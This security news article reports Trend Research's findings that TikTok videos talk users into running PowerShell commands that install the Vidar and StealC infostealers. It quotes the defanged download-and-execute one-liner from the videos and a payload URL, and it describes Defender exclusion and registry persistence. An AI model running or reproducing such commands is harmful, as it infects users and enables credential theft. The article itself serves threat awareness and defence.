In addition to emails, websites, and USB sticks, malware is now also spreading via TikTok. Although indirect, the malicious instructions on the video platform can have serious consequences.
This is according to Trend Research, part of security company Trend Micro. The specific malware variants that malicious actors are promoting via TikTok are two infostealers, Vidar and StealC. The videos may be AI-generated, which could allow the malware campaign to spread rapidly, multiply, and mix things up with regard to messaging.
TikTok’s algorithm significantly increases the likelihood of widespread exposure, according to the researchers, with one video reaching more than half a million views. This makes the platform an ideal tool for cybercriminals.
Social engineering via social media
Attackers have long used social media platforms for their attacks, and TikTok is no exception. However, previous campaigns used links to websites where malicious activity could be detected with traditional security software. Social engineering via TikTok is a different challenge, with the PowerShell execution of the instructions being the only point of detection.
Infostealers are also already very popular among cyber attackers. They have become an important tool for cybercriminals who collect login credentials, personal data, and other sensitive information that can then lead to identity theft, fraud, and data breaches.
In this new campaign, PowerShell, normally a technical tool, is used to get the payload onto a PC. The TikTok videos instruct users to execute malicious commands on their own systems.
How the attack works
Trend Research identified a TikTok user, @gitallowed, who posted several videos with the malicious instructions. Since then, more accounts with similar activities have been discovered, but these are no longer active. The attackers may be changing their accounts to circumvent bans.
In the most popular video (with over 500,000 views), the attacker presents a series of simple, step-by-step instructions that make the malicious process appear both legitimate and easy to follow: press Windows + R, type PowerShell, and execute the following command:
iex (irm hxxps://allaivo[.]me/spotify)
Malicious execution chain
The PowerShell command downloads and executes a script that then initiates a series of malicious actions. The script first creates hidden folders within the user’s AppData and LocalAppData folders and adds these locations to the Windows Defender exclusion list to bypass detection.
The script then fetches a secondary payload from hxxps://amssh[.]co/file.exe, which has been identified as Vidar or StealC malware, and stores it in the hidden folder. The script uses a retry mechanism to ensure that the payload is downloaded successfully and then launches the malware as a hidden, elevated process.
If the previous process is completed successfully, the script downloads an additional PowerShell script, stores it in the hidden folder, and ensures persistence by creating a registry key that executes the script at startup. Finally, temporary folders are deleted to minimize forensic traces.
Security implications
The shift to social media as a distribution mechanism for malware requires a review of security measures, Trend Research notes. Traditional controls are currently ineffective against this form of social engineering. The question is what else can be done to prevent attacks when the instructions are simply distributed via TikTok; sometimes, security awareness training is all that can be done. It is up to the security world to debunk this.
The mitigation may be unclear, but the consequences are crystal clear. Companies can be affected by data exfiltration, theft of login credentials, and possible compromise of sensitive systems as a result of this threat.
Also read: Fake LDAPNightmare exploit on GitHub spreads infostealer malware